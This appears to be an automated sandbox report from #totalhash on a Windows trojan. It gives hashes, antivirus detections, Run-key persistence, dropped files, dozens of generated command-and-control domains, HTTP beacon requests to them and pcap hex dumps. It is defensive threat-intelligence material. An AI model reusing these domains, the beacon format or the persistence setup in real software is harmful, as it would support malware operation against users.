Analysis | #totalhash

Analysis Date	2015-10-14 02:58:40
MD5	1c624878f8d1d6a778d36a1d67f566d0
SHA1	430873cf733e6ba7007865e421efdc4826b75de6

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: 86e5d5600e5581e4a72414bf6a8531ea sha1: abec6f632032f422729dae7bbe2beb7aedbcbaac size: 294912
Section	.rdata md5: 0b8b72b418e237bf5aea02bae1f2cb1e sha1: 33831d2edcaa8a8c8a4a68be4b04284e12e27337 size: 33280
Section	.data md5: 3dc0dc18ea52db24b627f1ac435c29ee sha1: a332ef0493eaf995efddc887ae071532ab5c339d size: 108544
Timestamp	2014-10-30 09:47:09
Packer	Microsoft Visual C++ ?.?
PEhash	2c6b6ec2bd36db5d9a89a3fe4094fdb63e6ae665
IMPhash	7ed1d92c42d61181d01ac4918a4da139
AV	CA (E-Trust Ino)	no_virus
AV	F-Secure	Gen:Variant.Symmi.22722
AV	Dr. Web	Trojan.DownLoader14.3653
AV	ClamAV	no_virus
AV	Arcabit (arcavir)	Gen:Variant.Symmi.22722
AV	BullGuard	Gen:Variant.Symmi.22722
AV	Padvish	no_virus
AV	VirusBlokAda (vba32)	no_virus
AV	CAT (quickheal)	Trojan.Dynamer.AC3
AV	Trend Micro	TROJ_FORUCON.BMC
AV	Kaspersky	Trojan.Win32.Generic
AV	Zillya!	Trojan.Agent.Win32.546225
AV	Emsisoft	Gen:Variant.Symmi.22722
AV	Ikarus	Trojan.FBAccountLock
AV	Frisk (f-prot)	no_virus
AV	Authentium	W32/Wonton.B.gen!Eldorado
AV	MalwareBytes	Trojan.Agent.Gen
AV	MicroWorld (escan)	Gen:Variant.Symmi.22722
AV	Microsoft Security Essentials	TrojanSpy:Win32/Nivdort.BD
AV	K7	Trojan ( 004cb2771 )
AV	BitDefender	Gen:Variant.Symmi.22722
AV	Fortinet	W32/Agent.VNC!tr
AV	Symantec	Downloader.Upatre!g15
AV	Grisoft (avg)	Win32/Cryptor
AV	Eset (nod32)	Win32/Agent.VNC
AV	Alwil (avast)	Downloader-TLD [Trj]
AV	Ad-Aware	Gen:Variant.Symmi.22722
AV	Rising	no_virus
AV	Twister	Trojan.Agent.VNC.yaeu
AV	Avira (antivir)	TR/AD.Nivdort.M.34
AV	Mcafee	Trojan-FEMT!1C624878F8D1

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Secure Fax Receiver Gateway WLAN BranchCache Base ➝ C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe
Creates File	C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe
Creates Process	C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe

Creates File	C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.kvi
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\qxlucfa.exe
Creates Process	WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe"

Network Details:

DNS	collegesister.net Type: A 98.139.135.129
DNS	collegelabor.net Type: A 173.254.12.103
DNS	middlesister.net Type: A 209.51.158.235
DNS	morningsilver.net Type: A 208.100.26.234
DNS	morningvalley.net Type: A 220.73.130.99
DNS	thinkdemand.net Type: A 184.168.221.43
DNS	collegesilver.net Type: A
DNS	chiefsister.net Type: A
DNS	chiefvalley.net Type: A
DNS	collegevalley.net Type: A
DNS	chieflabor.net Type: A
DNS	oftensilver.net Type: A
DNS	alonesilver.net Type: A
DNS	oftensister.net Type: A
DNS	alonesister.net Type: A
DNS	oftenvalley.net Type: A
DNS	alonevalley.net Type: A
DNS	oftenlabor.net Type: A
DNS	alonelabor.net Type: A
DNS	middlesilver.net Type: A
DNS	twelvesilver.net Type: A
DNS	twelvesister.net Type: A
DNS	middlevalley.net Type: A
DNS	twelvevalley.net Type: A
DNS	middlelabor.net Type: A
DNS	twelvelabor.net Type: A
DNS	rathersilver.net Type: A
DNS	rathersister.net Type: A
DNS	morningsister.net Type: A
DNS	rathervalley.net Type: A
DNS	ratherlabor.net Type: A
DNS	morninglabor.net Type: A
DNS	strangesilver.net Type: A
DNS	historysilver.net Type: A
DNS	strangesister.net Type: A
DNS	historysister.net Type: A
DNS	strangevalley.net Type: A
DNS	historyvalley.net Type: A
DNS	strangelabor.net Type: A
DNS	historylabor.net Type: A
DNS	amountsilver.net Type: A
DNS	weathersilver.net Type: A
DNS	amountsister.net Type: A
DNS	weathersister.net Type: A
DNS	amountvalley.net Type: A
DNS	weathervalley.net Type: A
DNS	amountlabor.net Type: A
DNS	weatherlabor.net Type: A
DNS	thicksilver.net Type: A
DNS	classsilver.net Type: A
DNS	thicksister.net Type: A
DNS	classsister.net Type: A
DNS	thickvalley.net Type: A
DNS	classvalley.net Type: A
DNS	thicklabor.net Type: A
DNS	classlabor.net Type: A
DNS	thinkbring.net Type: A
DNS	presentbring.net Type: A
DNS	thinklisten.net Type: A
DNS	presentlisten.net Type: A
DNS	presentdemand.net Type: A
DNS	thinkshout.net Type: A
DNS	presentshout.net Type: A
DNS	chiefbring.net Type: A
DNS	collegebring.net Type: A
DNS	chieflisten.net Type: A
DNS	collegelisten.net Type: A
DNS	chiefdemand.net Type: A
DNS	collegedemand.net Type: A
DNS	chiefshout.net Type: A
DNS	collegeshout.net Type: A
DNS	oftenbring.net Type: A
DNS	alonebring.net Type: A
DNS	oftenlisten.net Type: A
DNS	alonelisten.net Type: A
DNS	oftendemand.net Type: A
DNS	alonedemand.net Type: A
DNS	oftenshout.net Type: A
DNS	aloneshout.net Type: A
DNS	middlebring.net Type: A
DNS	twelvebring.net Type: A
DNS	middlelisten.net Type: A
DNS	twelvelisten.net Type: A
DNS	middledemand.net Type: A
DNS	twelvedemand.net Type: A
HTTP GET	http://collegesister.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent:
HTTP GET	http://collegelabor.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent:
HTTP GET	http://middlesister.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent:
HTTP GET	http://morningsilver.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent:
HTTP GET	http://morningvalley.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent:
HTTP GET	http://thinkdemand.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent:
Flows TCP	192.168.1.1:1031 ➝ 98.139.135.129:80
Flows TCP	192.168.1.1:1032 ➝ 173.254.12.103:80
Flows TCP	192.168.1.1:1033 ➝ 209.51.158.235:80
Flows TCP	192.168.1.1:1034 ➝ 208.100.26.234:80
Flows TCP	192.168.1.1:1035 ➝ 220.73.130.99:80
Flows TCP	192.168.1.1:1036 ➝ 184.168.221.43:80

Raw Pcap

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736361 74795f63 40796168   mail=scaty_c@yah
0x00000020 (00032)   6f6f2e63 6f6d266d 6574686f 643d706f   oo.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 6f6c6c65 67657369   .Host: collegesi
0x00000070 (00112)   73746572 2e6e6574 0d0a0d0a            ster.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736361 74795f63 40796168   mail=scaty_c@yah
0x00000020 (00032)   6f6f2e63 6f6d266d 6574686f 643d706f   oo.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 6f6c6c65 67656c61   .Host: collegela
0x00000070 (00112)   626f722e 6e65740d 0a0d0a0a            bor.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736361 74795f63 40796168   mail=scaty_c@yah
0x00000020 (00032)   6f6f2e63 6f6d266d 6574686f 643d706f   oo.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206d 6964646c 65736973   .Host: middlesis
0x00000070 (00112)   7465722e 6e65740d 0a0d0a0a            ter.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736361 74795f63 40796168   mail=scaty_c@yah
0x00000020 (00032)   6f6f2e63 6f6d266d 6574686f 643d706f   oo.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206d 6f726e69 6e677369   .Host: morningsi
0x00000070 (00112)   6c766572 2e6e6574 0d0a0d0a            lver.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736361 74795f63 40796168   mail=scaty_c@yah
0x00000020 (00032)   6f6f2e63 6f6d266d 6574686f 643d706f   oo.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206d 6f726e69 6e677661   .Host: morningva
0x00000070 (00112)   6c6c6579 2e6e6574 0d0a0d0a            lley.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736361 74795f63 40796168   mail=scaty_c@yah
0x00000020 (00032)   6f6f2e63 6f6d266d 6574686f 643d706f   oo.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 68696e6b 64656d61   .Host: thinkdema
0x00000070 (00112)   6e642e6e 65740d0a 0d0a0d0a            nd.net......

Strings